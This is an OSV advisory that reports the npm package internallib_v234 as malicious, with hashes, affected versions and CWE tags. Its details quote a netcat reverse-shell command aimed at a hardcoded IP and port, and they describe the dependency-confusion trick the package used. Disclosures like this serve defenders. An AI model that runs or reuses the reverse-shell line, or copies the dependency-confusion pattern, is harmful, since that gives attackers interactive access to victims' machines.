MAL-2026-6796

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v234/MAL-2026-6796.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6796
Published
2026-07-06T05:28:03Z
Modified
2026-07-06T06:46:42.990767214Z
Summary
Malicious code in internallib_v234 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087)

internallib_v234@1.0.6 exports a command() function whose body unconditionally invokes /bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash", opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs whereis nc to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (internallib_v234: ^1.0.0), and CI configuration references a private Verdaccio registry (npm update --registry http://0.0.0.0:4873/). The combination indicates a targeted attack against an organization that hosts a private internallib_v234 internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.0.3"
            ],
            "sha256": "04c12e7b603e60e2fdbd050a2a9b15b4061040b31bbb6bdf6d90b2295fd9a47e",
            "modified_time": "2026-07-06T05:28:11Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-008038",
            "import_time": "2026-07-06T06:35:49.401481717Z"
        },
        {
            "versions": [
                "1.0.5"
            ],
            "sha256": "d907ff37eec91a2e89c95755697ca2765def0877cf48afd76e5126cffa7cf02e",
            "modified_time": "2026-07-06T05:28:27Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-008040",
            "import_time": "2026-07-06T06:35:49.521753011Z"
        },
        {
            "versions": [
                "1.0.6"
            ],
            "sha256": "8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087",
            "source": "amazon-inspector",
            "modified_time": "2026-07-06T05:28:18Z",
            "id": "IN-MAL-2026-008039",
            "import_time": "2026-07-06T06:35:49.469873614Z"
        },
        {
            "versions": [
                "1.0.7"
            ],
            "sha256": "c81ea4974b3fc3c86e91ae44b3f9d618b24d1849da30ac74427884b51142eacf",
            "modified_time": "2026-07-06T05:28:03Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-008037",
            "import_time": "2026-07-06T06:35:49.338564124Z"
        },
        {
            "versions": [
                "1.0.4"
            ],
            "sha256": "d0a13bb05b557bb0d0570548da606cf43184f0f80870d95f14299e0437de8c71",
            "modified_time": "2026-07-06T05:28:35Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-008041",
            "import_time": "2026-07-06T06:35:49.591623935Z"
        }
    ]
}
References
Credits

Affected packages

npm / internallib_v234

Package

Affected ranges

Affected versions

1.*
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "internallib_v234-1.0.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-oPEsIlX6Qr9Iv1H9KWUiU7SSn/sCvXAek/GLl9ErcQTkY2IgvwptTCIqxc0n+iVhGWh5TyAZ0DEuXdVsxF4b/Q==",
                "sha1": "56fe81a96d30078411d388c477a96bcd9586b1ce"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "c7c173225ff214d98f2f754db88502220b38835aba3e4c89d9b3ffc09f2ceeb0",
            "path": "index.js",
            "tlsh": "41c022a785960b2ab70822e09c01f862a8438c703a3c40b0e0888151009384e66470bf"
        },
        {
            "sha256": "272b710ae50ce4eb6bd1f2dcefc2fb59c5482be4d9cd058d06f848901ce44dd2",
            "path": "package.json",
            "tlsh": "26d02e200d235cb321c5036a2c69801372608e3f004abc0c9bcb0a2c40cf2b7a8fd30c"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v234/MAL-2026-6796.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]